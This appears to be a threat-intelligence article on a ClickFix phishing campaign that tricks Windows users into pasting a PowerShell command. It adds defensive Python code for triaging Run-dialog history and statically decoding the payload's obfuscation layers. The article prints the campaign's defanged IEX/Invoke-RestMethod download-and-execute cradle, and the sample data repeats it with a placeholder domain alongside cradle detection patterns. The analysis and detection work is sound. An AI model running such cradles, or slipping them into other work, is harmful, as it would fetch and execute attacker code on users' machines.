Hackers Using ClickFix Technique to Attack Windows Machine and Execute Powershell Commands


A sophisticated new attack campaign has emerged targeting Israeli businesses and infrastructure sectors through a deceptive social engineering technique known as “ClickFix,” which tricks users into executing malicious PowerShell commands on their Windows systems.

The multi-stage attack chain begins with phishing emails disguised as invitations to educational webinars about handling wartime medical supplies, demonstrating how threat actors exploit current regional tensions to enhance their social engineering effectiveness.

Attack flow chart (Source – Fortinet)

The attack operates through a carefully orchestrated sequence that starts when victims click on embedded links in phishing emails, redirecting them to spoofed Microsoft Teams pages.


These fake landing pages instruct users to perform a specific sequence of actions: pressing Windows+R to open the Run dialog box, pasting a copied string using Ctrl+V, and pressing Enter to execute what appears to be a legitimate verification process.

However, this sequence actually triggers the execution of a malicious PowerShell command that initiates the infection chain.

Fortinet analysts identified this targeted intrusion campaign through their FortiMail Workspace Security team, revealing that the entire attack relies exclusively on PowerShell execution without requiring external executables.

The researchers discovered evidence of lateral movement and surveillance activity, along with potential overlaps with MuddyWater campaign tactics, though attribution remains inconclusive due to notable tactical differences from traditional MuddyWater operations.

The initial payload contains a Base64-encoded PowerShell command obfuscated across three strings within the phishing site’s HTML code.

Once concatenated and decoded, it produces the following command:

powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Fix -Method GET)[.]note[.]body)

This command initiates the retrieval and execution of a secondary PowerShell script from the attacker’s infrastructure, establishing the foundation for the complete compromise of the target system.
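Because the victim types the command into the Run dialog, the one-liner is recorded in the user's Run history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (entries there normally carry a trailing "\1"), and the resulting PowerShell process has explorer.exe as its parent. The following triage script is an added example written for this article, not code from Fortinet or from the campaign: it scans a list of Run-dialog or process command lines for the ClickFix shape (PowerShell plus a download cradle such as IEX with Invoke-RestMethod, or an encoded command). The sample entries and the example.invalid domain are constructed.

```python
import re

# Primitives that make up a PowerShell download-and-execute cradle. The command
# quoted in the article combines IEX with Invoke-RestMethod.
CRADLE_PATTERNS = {
    "iex": re.compile(r"\biex\b|invoke-expression", re.I),
    "web-fetch": re.compile(
        r"invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|downloadstring|net\.webclient",
        re.I),
    "encoded": re.compile(r"frombase64string|-enc(odedcommand)?\b", re.I),
}
URL_RE = re.compile(r"https?://\S+", re.I)
POWERSHELL_RE = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)


def strip_runmru(value):
    """RunMRU stores each entry as '<command>\\1'; drop that suffix if present."""
    return value[:-2] if value.endswith("\\1") else value


def analyse_command(cmd):
    """Return the list of indicators found in one command line, in a fixed order."""
    reasons = []
    if POWERSHELL_RE.search(cmd):
        reasons.append("powershell")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmd):
            reasons.append(name)
    if URL_RE.search(cmd):
        reasons.append("url")
    return reasons


def is_clickfix_candidate(reasons):
    """PowerShell that evaluates fetched or encoded content is the ClickFix shape.

    A plain 'powershell -Command Get-Process' has no cradle and is not flagged.
    """
    has_cradle = "iex" in reasons and ("web-fetch" in reasons or "url" in reasons)
    return "powershell" in reasons and (has_cradle or "encoded" in reasons)


def find_clickfix_candidates(entries):
    """Scan RunMRU-style entries; return (index, command, reasons) for each hit."""
    hits = []
    for idx, raw in enumerate(entries):
        cmd = strip_runmru(raw)
        reasons = analyse_command(cmd)
        if is_clickfix_candidate(reasons):
            hits.append((idx, cmd, reasons))
    return hits


# Constructed RunMRU export (not real telemetry); the first entry mirrors the
# cradle quoted in the article with a placeholder domain, the last is an
# encoded-command variant with a meaningless Base64 placeholder.
SAMPLE_RUNMRU = [
    r"powershell IEX ((Invoke-RestMethod -Uri https://example.invalid/Fix -Method GET).note.body)\1",
    r"notepad.exe\1",
    r"powershell -Command Get-Process\1",
    r"mstsc /v:fileserver01\1",
    r"powershell -w hidden -enc QUFBQQ==\1",
]

if __name__ == "__main__":
    for idx, cmd, reasons in find_clickfix_candidates(SAMPLE_RUNMRU):
        print(f"entry {idx}: {reasons} -> {cmd}")
```

In production the same logic applies to Sysmon event 1 or Security event 4688 command lines filtered on a parent of explorer.exe, and to PowerShell script block logs (event 4104), which capture the one-liner even when the Run history is cleared.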

Multi-Stage Obfuscation and Payload Delivery

The attack employs sophisticated obfuscation techniques that demonstrate advanced technical capabilities.

After the initial payload execution, the malware downloads two critical files: test.html, which contains a blob object with binary data encoded between special tag markers, and a secondary PowerShell script that reconstructs the final malicious payload.

Script infinite loop (Source – Fortinet)

The script employs a unique decoding mechanism that splits binary-encoded chunks separated by the delimiter “kendrick,” converts them from binary to ASCII characters, and reassembles the result into executable PowerShell code.

The final stage deploys a remote access trojan entirely through PowerShell, establishing persistent communication with the command and control server at pharmacynod[.]com.

The malware implements multiple stealth techniques including GZip compression, Base64 encoding, string reversal, and legitimate User-Agent strings to evade detection while maintaining continuous surveillance capabilities on compromised systems.
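Each encoding layer named above (the Base64 command split across three strings, the "kendrick"-delimited binary chunks in test.html, and the reversed, Base64-encoded, GZip-compressed strings of the final stage) can be peeled off with a few lines of Python. The decoder below is an added example for analysts and is not Fortinet's tooling or the campaign's own script. The <blob> tag markers are hypothetical, since the article does not name the real ones, and the nesting order reverse, then Base64, then GZip is an assumption; all sample inputs are constructed and wrap harmless commands.

```python
import base64
import gzip

# Delimiter the article reports between the binary chunks of the second-stage script.
DELIMITER = "kendrick"

# Hypothetical markers: the article only says the blob sits "between special tag
# markers", so swap these for the ones observed in a real sample.
BLOB_START, BLOB_END = "<blob>", "</blob>"


def join_and_decode_base64(fragments, encoding="utf-8"):
    """Concatenate Base64 pieces scattered through a page and decode the result.

    Assumption: the pieces carry UTF-8 text. A PowerShell -EncodedCommand
    payload is UTF-16LE instead, so pass encoding="utf-16-le" for that case.
    """
    return base64.b64decode("".join(fragments)).decode(encoding)


def extract_blob(html, start=BLOB_START, end=BLOB_END):
    """Return the text between the two markers, or None if either is missing."""
    i = html.find(start)
    j = html.find(end, i + len(start)) if i != -1 else -1
    if i == -1 or j == -1:
        return None
    return html[i + len(start):j]


def decode_binary_chunks(blob, delimiter=DELIMITER):
    """Split on the delimiter and turn every 8-bit group into one ASCII character."""
    out = []
    for chunk in blob.split(delimiter):
        chunk = chunk.strip()
        if not chunk:
            continue  # tolerate a leading or trailing delimiter
        if len(chunk) % 8 or set(chunk) - {"0", "1"}:
            raise ValueError(f"not 8-bit binary: {chunk!r}")
        out.extend(chr(int(chunk[k:k + 8], 2)) for k in range(0, len(chunk), 8))
    return "".join(out)


def unwrap_reversed_gzip_base64(text):
    """Undo reverse -> Base64 -> GZip, the three wrappers the article lists.

    Assumption: that nesting order; a real sample may stack them differently.
    """
    return gzip.decompress(base64.b64decode(text[::-1])).decode("utf-8")


# Constructed samples (not the campaign's data) wrapping benign commands.
_B64 = base64.b64encode(b"Write-Output 'benign'").decode()
SAMPLE_FRAGMENTS = [_B64[:7], _B64[7:15], _B64[15:]]
SAMPLE_HTML = ("<html>" + BLOB_START
               + DELIMITER.join(format(ord(c), "08b") for c in "Write-Output 'decoded'")
               + BLOB_END + "</html>")
SAMPLE_LAYERED = base64.b64encode(gzip.compress(b"Write-Output 'layered'")).decode()[::-1]

if __name__ == "__main__":
    print(join_and_decode_base64(SAMPLE_FRAGMENTS))
    print(decode_binary_chunks(extract_blob(SAMPLE_HTML)))
    print(unwrap_reversed_gzip_base64(SAMPLE_LAYERED))
```

Decoding statically in this way, rather than letting the script run, keeps the reconstructed PowerShell as text for indicator extraction without ever executing it; the delimiter, markers and layer order are the sample-specific values to confirm against the real files first.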



About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.